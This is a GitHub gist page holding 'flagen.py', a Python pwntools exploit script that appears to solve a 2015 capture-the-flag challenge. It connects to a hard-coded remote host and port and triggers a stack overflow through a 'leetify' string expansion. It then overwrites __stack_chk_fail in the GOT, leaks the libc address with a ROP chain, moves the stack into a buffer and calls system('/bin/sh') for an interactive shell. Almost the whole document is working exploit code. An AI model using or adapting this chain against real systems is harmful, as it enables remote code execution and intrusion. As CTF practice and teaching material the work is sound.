Skip to content

Instantly share code, notes, and snippets.

@seanwupi

seanwupi/flagen.py Secret

Created Mar 29, 2015
Embed
What would you like to do?
#!/usr/bin/env python
from pwn import * # pip install pwntools
# "H" -> "1-1" => len*3 => stack overflow
# => overwrite arg1 => strcpy(arg1, str)
# => overwrite __stack_chk_fail@got.plt (ret)
r = remote('202.112.26.106', 5149)
pop_ebp_ret = 0x08048B01
pop_edi_ebp_ret = 0x08048D8E
leave_ret = 0x080485D8
puts = 0x08048510
readline = 0x080486CB
ret = 0x08048DB7
buf = 0x0804BCF0
# prepare flag
r.recvuntil('Your choice: ')
r.send('1\n')
sleep(0.5)
r.send(p32(ret) + 'AAAAAAAA' +
p32(0x80484B6) + # fix printf
'0' + 'H'*85 +
p32(pop_ebp_ret) + # retaddr
p32(0x0804B01C) + # arg1
p32(puts) + p32(pop_ebp_ret) + p32(0x0804B010) + # puts(puts@got.plt)
p32(readline) + p32(pop_edi_ebp_ret) + p32(buf) + p32(0x01010101) + # readline(buf, size)
p32(pop_ebp_ret) + p32(buf-4) + p32(leave_ret) + # migrate stack to buf
'\n')
# trigger by 'leetify'
r.recvuntil('Your choice: ')
r.send('4\n')
x = r.recvrepeat(0.5)[:4]
libc_base = u32(x) - 0x00065650 # puts_off
print 'libc =', hex(libc_base)
# send second ROP chain (@buf)
system = 0x00040190 + libc_base
sh = 0x160A24 + libc_base
r.send(p32(system) + p32(0) + p32(sh) + '\n') # system("/bin/sh")
r.interactive()
r.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.